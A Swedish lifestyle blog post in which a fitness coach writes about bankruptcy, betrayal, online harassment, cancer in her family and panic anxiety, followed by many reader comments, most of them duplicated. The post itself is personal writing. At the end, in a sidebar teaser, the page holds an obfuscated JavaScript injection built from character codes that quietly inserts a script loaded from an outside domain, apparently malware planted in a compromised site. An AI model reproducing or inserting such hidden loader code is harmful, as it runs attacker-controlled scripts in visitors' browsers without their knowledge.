Nu ger jag fingret åt tre saker…. Idag börjar min resa.

image

Hej fina! Klockan ringde 05:00. Det tog emot att kliva upp…. Idag har jag PT kunder som avlöser varandra oavbrutet. Jag börjat bli väldigt bokad. Jag trivs i min roll som personlig PT och coach. Jag drivs av att se andra lyckas och uppnå sina mål. När jag möter en  eventuell PT kund första gången så ställer jag många frågor. Jag är nyfiken, jag iakttar, jag LYSSNAR, jag ser och jag observerar. Några av frågorna jag ställer är bl.a.

-Vad är DITT mål?

-Varför just det målet?

-Vad är du villig att göra för att nå ditt mål?

-Vad får dig att må riktigt bra?

En intervju innebär såklart mycket mer än bara dessa frågor. Jag tar reda på bakgrund, förutsättningar, erfarenhet, personfakta, eventuella skador, målmedvetenhet, tidsram och allt som kan vara bra för mig att veta för att skräddarsy ett upplägg som passar just personens individuell mål.

Jag ställde mig själv dessa frågor. (Och några till)  vad får MIG att må bra?

Många gånger så pratat man om vad man INTE mår bra av, Vad man INTE borde gjort. Man fokuserat mer på det negativa än det positiva.

-GÖR INTE det! Fokusera på det som får dig att må bra, på det som ger energi och inte tvärt om… 

IDAG börjar jag MIN resa mot mina mål. Jag anammat Gunde svans uttryck ”ingenting är omöjligt”! Det är så sant….

Detta året har varit utmanande på många plan. Mörka, stormiga och svåra perioder. Konkursen med allt vad det innebar höll på att knäcka mig. (Du hittar det inlägget HÄR) 

Jag var påväg ner för ruinens brant. Jag har nog aldrig varit så nära att gå sönder, att ge efter för smärtan och ångesten.

Då har jag som maskrosbarn varit med om mycket, redan innan. Så jag trodde på något konstigt sätt att jag var odödlig och ”okrossbar” . Men även jag har mina gränser.

konkursen och den både fysiska och psykiska press som jag utsattes för blev en prövning. Detta i kombination med att någon jag aldrig trodde skulle vika från min sida, svek mig, sårade mig och förvandlades till en mardröm….  Sveket från dom som stod mig närmast, som jag älskade som min egna familj, som jag aldrig tvivlat på, utan från hjärtat älskat villkorslöst.  DET sveket är en sorg. En sorg som jag bearbetar och sakta men säkert repar mig ifrån.

Påföljderna blev en häxjakt och ett näthat som jag aldrig kunnat föreställa mig. Vuxna människor som sitter bakom sina mobiler, datorer och paddor och medvetet går in för att jävlas och förstöra mitt liv.  Både människor jag vet vilka dom är, men också helt anonyma människor som verkligen inte känner mig. Påföljderna blev ännu värre. Anmälningar till olika myndigheter. Så sent som i förra veckan. Hat och hot brev. Förtal och rykten. Skitsnck och ryktesspridning, om mig… det kan jag ta. Men när det går till anmälningar och saker där min son blandas in. Då har det gått FÖR långt! Barnen ska inte bli lidande! 

Ja…. 2016 och vuxen mobbning på skrämmande hög nivå.

Jag hade kunnat ”slå tillbaka”, kunnat ”ge igen” , berättat sanningen, för att rentvå mig själv…. men inte. Det är inte min grej , det är inte vad jag står för. 

Jag vill bara bli lämnad ifred. Jag VET att sanningen alltid kommer fram. Jag vet att den kommer att göra det……….. När den väl gör det så kommer dessa lättmanipulerad personerna som svikit mig, förmodligen se saker på ett annat sätt, och då inse sitt misstag. 

Nåväl, man lär sig mycket genom motgångar. Bla att det inte är någon idé att lägga någon energi på det som man inte kan påverka. Det kan vara svårt, och någonting  jag fått påminna mig om…. Men det är helt meningslöst att göra det. 

Förutom detta så har två cancerbesked och två dödsfall också drabbat mig och min familj. Jag HATAR cancer! Skrämmande, läskiga, vidriga sjukdom!!!!

 Konsekvenserna har blivit att jag lider av ångest. Även panikångest. Vissa tycker inte jag ska skriva om ångesten. Vissa tycker att ”jag borde tysta ner det”. Ångest är SÅ vanligt, men ändå så tabubelagt! -Varför?

 jag är MEDVETEN om hur jag mår, jag är medveten om att jag behöver hjälp. Jag tar emot hjälpen och växer enormt som människa. Jag mår mycket bättre nu än tidigare. Panikångesten kommer fortfarande, men med betydligt större mellanrum än innan. 

Jag kollapsade fullständig, men vågade be om hjälp. Jag blev mottaglig för en förändring. På bara några månader har jag lärt mig att andas, att ta kontrollen över ångesten och sakta men säkert ta mig upp från mitt svarta hål.

Jag gör framsteg. Jag klättrar sakta men säkert uppåt. Faller ner ibland, men håller mig kvar och tar nya tag.

Jag skäms inte över att jag lider av ångest. Det är helt okay att inte alltid må bra.

Jag är inte ”där” än, men jag är betydligt närmare idag… Än vad jag var igår. DET är det som räknas. 

inget ont som inte har något gott med sig. Jag har lärt mig så sjukt mycket om mig själv, om vad jag vill, och hur jag vill leva mitt liv. På väldigt kort tid. Vissa dagar orkar kah inte träffa folk, jag kliver knappt ur sängen och förmår ingenting. Men det är helt okay.

Jag har också den hårda vägen fått se vem/vilka som faktisk finns där när det väl gäller. Fått de vilka som är dom där vännerna med stort V, som man kan lita på även när det stormar. TACK underbara ni  <3 

Jag har alltid varit driven, och med ambitioner i allt jag gör. När jag nu ställde mig själv samma frågor som jag ställer till mina kunder så bestämde jag mig.

Idag börjar min resa mot mina personliga mål. Idag tar jag mitt första steg…..  -INGENTING kan stoppa mig! 

Nu vill Jag att vi sprider mer kärlek och motivation! Skippa näthat och mobbning! Det är inte särskilt coolt. Jag kan inte ta ansvar för andra, men jag kan ta ansvar för mig själv.

Jag vill vara en förebild, en inspiration. Både som mamma och som socialmedia influenser.

Så nu ger jag fingret åt tre saker! 

image

Fuck cancer! Fuck näthat! Fuck vuxenmobbning! 

Mer kärlek istället! <3

kramar My Martens

114 Komentarer

 1. Fina vackra starka duktiga My? du är en riktig kämpe. Jag önskar dig och din familj all välgång och lycka…det förtjänar ni. Trots att jag är mycket äldre än du så läser jag din blogg varje dag och du ger mig enorm energi och motivation. Stor kram till dig och lilleman??

 2. Hej fina My . Har läst din blogg länge , o du levererar med råge ! Mkt inspiration oxå mkt reklam iof ! Du har växt i mina ögon ! Ta inte åt dig av allt näthat ! Men hoppas du ngn gång berättar allt !! Kram på dig o må så gott

 3. Vill bara säga att jag tycker du ser helt fantastisk ut på bilderna. Du strålar:)
  Angående panikångesten så vet jag alltför väl hur det är… det viktiga är att det går framåt en liten bit i taget. Detta fixar vi!!Kramar i massor, ta hand om dig❤

 4. Men My du kanske inte ska streta så mycket eftersom du har svårt att hålla tätt, en liten fläck i brallan, kniip;) Problem för många kvinnor, kanske något att ta upp i bloggen. Kram

 5. Fina vackra starka duktiga My😙 du är en riktig kämpe. Jag önskar dig och din familj all välgång och lycka…det förtjänar ni. Trots att jag är mycket äldre än du så läser jag din blogg varje dag och du ger mig enorm energi och motivation. Stor kram till dig och lilleman😙😙

 6. Spara det här inlägget, ta fram och läs det då och då när det är jobbigt så du inte glömmer att ge fingret istället! 💪

 7. Hej fina My . Har läst din blogg länge , o du levererar med råge ! Mkt inspiration oxå mkt reklam iof ! Du har växt i mina ögon ! Ta inte åt dig av allt näthat ! Men hoppas du ngn gång berättar allt !! Kram på dig o må så gott

 8. Vill bara säga att jag tycker du ser helt fantastisk ut på bilderna. Du strålar:)

  Angående panikångesten så vet jag alltför väl hur det är… det viktiga är att det går framåt en liten bit i taget. Detta fixar vi!!Kramar i massor, ta hand om dig❤

 9. Men My du kanske inte ska streta så mycket eftersom du har svårt att hålla tätt, en liten fläck i brallan, kniip;) Problem för många kvinnor, kanske något att ta upp i bloggen. Kram

 10. Fina My, jag håller med, jag pekar också finger åt alla dessa saker du nämner. Fuck allt det negativa jädrans skitet som finns och att det ens är vuxna människor som har mage att bete sig som de gör, mobbar och hatar är ju fan pinsamt och vidrigt. Äckliga människor som saknar skam och positivitet i deras kroppar, saknar kärlek i sina liv, äkta kärlek och därför skapar sån bitterhet. Du däremot är full av kärlek, förståelse och omtänksamhet. Jag tackar dig djupast för din förståelse för du vet vad som vi hördes vid om förut, du är en fin människa. <3 Jag är glad att du känner dig starkare och pekar fuck åt allt det negativa skitet, för du är värd så mycket bättre, du är värd så mycket och folk som sviker kommer alltid att finnas, det gäller att ha koll på de där andra som finns där. <3 Stor kram

  • Usch…. Ja, det är så sorgligt. Men, man kan inte ta ansvar för andras handlingar. Man kan bara påverka sig själv och sin egna framtid… ❤️ Tack fina du? Kram

 11. du berättar ju inget om den såkallade mobbning så jag börjar tro att det bara är ett spel från ***** dig mm för att få besökare till era bloggar

 12. Hej!
  För ditt eget bästa, tycker jag att du bara ska släppa de förflutna o inte älta i det som bara tar en massa energi. För du vill väll ändå inte ha tillbaka dom människorna som har svikit dig?
  Kram

  • Det tillhör dock inte det förflutna än. Det pågår fortfarande. Men visst är det så att det är vissa människor som jag inte vill ha i mitt liv. Kram

 13. Fina My, jag håller med, jag pekar också finger åt alla dessa saker du nämner. Fuck allt det negativa jädrans skitet som finns och att det ens är vuxna människor som har mage att bete sig som de gör, mobbar och hatar är ju fan pinsamt och vidrigt. Äckliga människor som saknar skam och positivitet i deras kroppar, saknar kärlek i sina liv, äkta kärlek och därför skapar sån bitterhet. Du däremot är full av kärlek, förståelse och omtänksamhet. Jag tackar dig djupast för din förståelse för du vet vad som vi hördes vid om förut, du är en fin människa. <3 Jag är glad att du känner dig starkare och pekar fuck åt allt det negativa skitet, för du är värd så mycket bättre, du är värd så mycket och folk som sviker kommer alltid att finnas, det gäller att ha koll på de där andra som finns där. <3 Stor kram

  • Usch…. Ja, det är så sorgligt. Men, man kan inte ta ansvar för andras handlingar. Man kan bara påverka sig själv och sin egna framtid… ❤️ Tack fina du💕 Kram

 14. du berättar ju inget om den såkallade mobbning så jag börjar tro att det bara är ett spel från ***** dig mm för att få besökare till era bloggar

 15. Hej!
  För ditt eget bästa, tycker jag att du bara ska släppa de förflutna o inte älta i det som bara tar en massa energi. För du vill väll ändå inte ha tillbaka dom människorna som har svikit dig?
  Kram

  • Det tillhör dock inte det förflutna än. Det pågår fortfarande. Men visst är det så att det är vissa människor som jag inte vill ha i mitt liv. Kram

 16. Ja, tänk vad mycket som har hänt på så pass kort tid ändå ! Och du har klarat det med bravur när en annan hade legat o krälat på golvet.
  Ingenting är omöjligt ?
  Trevlig helg ? Kram

 17. Ja, tänk vad mycket som har hänt på så pass kort tid ändå ! Och du har klarat det med bravur när en annan hade legat o krälat på golvet.
  Ingenting är omöjligt 😄
  Trevlig helg 😄 Kram

 18. Å My! Så jäkla håll käften snygg och fräsch du ser ut! Ser verkligen ut som att du är på rätt väg till ett harmoniskt liv. Stå på dig och skit i de andra fegisarna. Värsta som finns när flera gaddar ihop sig,fegt är bara förnamnet! Älskar din blogg och ditt jäklar anamma. Du är så personlig och svarar också så ofta du kan,det gillar man,då känns det nästan som man känner dig??Trevlig helg! Kraaam

 19. Håller med dig ,sprid mer äkta god kärlek både på nätet och i verkliga livet.Vill bara skicka en stor varm styrkekram till dig.

 20. Å My! Så jäkla håll käften snygg och fräsch du ser ut! Ser verkligen ut som att du är på rätt väg till ett harmoniskt liv. Stå på dig och skit i de andra fegisarna. Värsta som finns när flera gaddar ihop sig,fegt är bara förnamnet! Älskar din blogg och ditt jäklar anamma. Du är så personlig och svarar också så ofta du kan,det gillar man,då känns det nästan som man känner dig😊💗Trevlig helg! Kraaam

 21. Håller med dig ,sprid mer äkta god kärlek både på nätet och i verkliga livet.Vill bara skicka en stor varm styrkekram till dig.

 22. Du fina My! Jag skriver om mitt utmattningssyndrom på min blogg och där ingår bl a ångest och tårar, Det är min verklighet just nu och jag kommer att fortsätta skriva om den, skriva om den för att jag behöver det!
  Idag på min blogg skriver jag om fem saker jag behöver för att överleva och dessa saker är så långt ifrån de saker du ger fingret till! Världen skulle vara en liten finare plats om vi istället värnade om varandra! Var nu rädd om dig och låt ångesten komma när den kommer, följden istället för att kämpa emot, då ebbar den ut så mycket snabbare. KRAMAR och fin fredag till dig!

 23. Du fina My! Jag skriver om mitt utmattningssyndrom på min blogg och där ingår bl a ångest och tårar, Det är min verklighet just nu och jag kommer att fortsätta skriva om den, skriva om den för att jag behöver det!
  Idag på min blogg skriver jag om fem saker jag behöver för att överleva och dessa saker är så långt ifrån de saker du ger fingret till! Världen skulle vara en liten finare plats om vi istället värnade om varandra! Var nu rädd om dig och låt ångesten komma när den kommer, följden istället för att kämpa emot, då ebbar den ut så mycket snabbare. KRAMAR och fin fredag till dig!

 24. Vilda diskussioner om dig hos Bloggbevakning. Tror det finns typ 43 kommentarer under senaste inlägget om dig. Inet smickrande. Mobbing kanske?

  • Förstår inte hur du vill gå in där o bidra till den gegga mojan som skrivs där eller du är den som står o hejar på ?
   Men hon som skriver där tycks ju inte ha så mycket annat att skriva om än My.

 25. Vilda diskussioner om dig hos Bloggbevakning. Tror det finns typ 43 kommentarer under senaste inlägget om dig. Inet smickrande. Mobbing kanske?

  • Förstår inte hur du vill gå in där o bidra till den gegga mojan som skrivs där eller du är den som står o hejar på ?
   Men hon som skriver där tycks ju inte ha så mycket annat att skriva om än My.

 26. Hoppas också du lägger det bakom dig nu låter det försvinna helt från din blogg låter det vara en gång för alla skriv om annat My de här inläggen drar bara igång en massa igen. F… det nu och gå vidare på din resa som kommer att bli bra ?.

 27. Men varför drar du upp detta heeeeeela tiden? Att gå vidare och lämna saker och som du säger ”ge fingret åt” handlar väl knappast om ständiga snyftinlägg?

  • För att det kommer något nytt DAGLIGEN! Hat/hotmail anmälningar….
   Jag står inför diverse utredningar som jag blivit anmäld till. SOC, RO m.m
   Då tycker jag att man absolut kan ge fingret ät näthat, cancer och vuxenmobbning. För att istället sprida kärlek? Håller du inte med? Ska jag lägga mig ner och ge upp? Nej, det kommer jag inte göra.

   • Du gastar om hat och mobbing men du ger aldrig något konkret exempel på VAD anmälningarna gäller eller VAD du anser vara mobbing. Du måste ju begripa att det spekuleras. Kommentarerna hos Bloggbevakning ger en ganska klar bild av att du får ligga som du har bäddat. Är det sanningen som skrivs där är det inte konstigt att vänner vänder dig ryggen. Om det är på något annat vis är det kanske dags att du lägger fram din sanning?

    • Och du tror på vad som någon skriver på Bloggbevakningen?
     Tycker det är bra att inte My sänker sig till andra bloggares nivå och sprider dynga. Tror inte jag sett någon gång i denna bloggen att My skrivit ut namn eller att hon skriver mer än vad som behövs. Inga anklagelser specifikt på någon.
     För övrigt är det jäkligt märkligt att hon som har Bloggbevakning drar upp allt om andra men hon själv har bra många skelett i garderoben. HON om någon ska inte kasta sten i glashus.

   • Du skriver själv ”fokusera på det som är bra” gör det nu och låt allt det gamla vara, lämna det och skriv inte mer om det för din skull My.

 28. Hoppas också du lägger det bakom dig nu låter det försvinna helt från din blogg låter det vara en gång för alla skriv om annat My de här inläggen drar bara igång en massa igen. F… det nu och gå vidare på din resa som kommer att bli bra 👍.

 29. Hej My !
  Detta är andra gången jag kommenterar på din blogg . Tyvärr har jag blivit utsatt för hat och mobbing på samma sätt som du, fast för min del av arbetskompisar och CHEF. Men när jag går in på din blogg får jag styrka och motivation att inte nån skit . Tack vare dig har dom inte lyckats knäcka mig och kommer aldrig kunna göra det heller . Tack för att du är så jäkla motiverande och inspirerande. Du får mig att kämpa !❤️

 30. Men varför drar du upp detta heeeeeela tiden? Att gå vidare och lämna saker och som du säger ”ge fingret åt” handlar väl knappast om ständiga snyftinlägg?

  • För att det kommer något nytt DAGLIGEN! Hat/hotmail anmälningar….

   Jag står inför diverse utredningar som jag blivit anmäld till. SOC, RO m.m

   Då tycker jag att man absolut kan ge fingret ät näthat, cancer och vuxenmobbning. För att istället sprida kärlek? Håller du inte med? Ska jag lägga mig ner och ge upp? Nej, det kommer jag inte göra.

   • Du gastar om hat och mobbing men du ger aldrig något konkret exempel på VAD anmälningarna gäller eller VAD du anser vara mobbing. Du måste ju begripa att det spekuleras. Kommentarerna hos Bloggbevakning ger en ganska klar bild av att du får ligga som du har bäddat. Är det sanningen som skrivs där är det inte konstigt att vänner vänder dig ryggen. Om det är på något annat vis är det kanske dags att du lägger fram din sanning?

    • Och du tror på vad som någon skriver på Bloggbevakningen?
     Tycker det är bra att inte My sänker sig till andra bloggares nivå och sprider dynga. Tror inte jag sett någon gång i denna bloggen att My skrivit ut namn eller att hon skriver mer än vad som behövs. Inga anklagelser specifikt på någon.

     För övrigt är det jäkligt märkligt att hon som har Bloggbevakning drar upp allt om andra men hon själv har bra många skelett i garderoben. HON om någon ska inte kasta sten i glashus.

   • Du skriver själv ”fokusera på det som är bra” gör det nu och låt allt det gamla vara, lämna det och skriv inte mer om det för din skull My.

 31. Hej My !
  Detta är andra gången jag kommenterar på din blogg . Tyvärr har jag blivit utsatt för hat och mobbing på samma sätt som du, fast för min del av arbetskompisar och CHEF. Men när jag går in på din blogg får jag styrka och motivation att inte nån skit . Tack vare dig har dom inte lyckats knäcka mig och kommer aldrig kunna göra det heller . Tack för att du är så jäkla motiverande och inspirerande. Du får mig att kämpa !❤️

 32. Du behöver inte vara rädd för en utredning! Att det kommit in en orosamnälan till socialen betyder inte att det blir en utredning. Det ska mycket till för att det ska gå vidare med att starta upp en utredning.

  • Där har du fel. Soc måste utreda om det kommer in en anmälan. Däremot kan dom lägga ner den fort om dom anser att det inte är någon fara för barnets välmående.

 33. Du behöver inte vara rädd för en utredning! Att det kommit in en orosamnälan till socialen betyder inte att det blir en utredning. Det ska mycket till för att det ska gå vidare med att starta upp en utredning.

  • Där har du fel. Soc måste utreda om det kommer in en anmälan. Däremot kan dom lägga ner den fort om dom anser att det inte är någon fara för barnets välmående.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/